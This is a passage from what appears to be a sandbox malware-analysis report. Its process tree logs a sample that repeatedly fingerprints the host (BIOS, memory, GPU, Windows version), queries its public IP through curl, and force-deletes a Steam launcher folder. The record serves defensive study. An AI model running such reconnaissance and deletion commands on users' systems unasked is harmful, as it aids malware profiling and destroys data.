C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:4120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:3464
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:4140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:3620
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:256
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:3980
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:4012
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:2372
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher"" 4⤵ PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:2144
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:3636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:3364
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:3424
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:4344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:928
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:3428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:3028
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:3924
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:4936
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:2716
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:1476
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:1960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:3908
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:1144
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:1056
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:564
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:2760
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:4332
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:3144
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:4248
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:5032
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:3080
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:700
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:636
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:3232
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:3716
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:2148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:3500
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:2592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:2144
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:3552
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:2884

Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize
1.8MB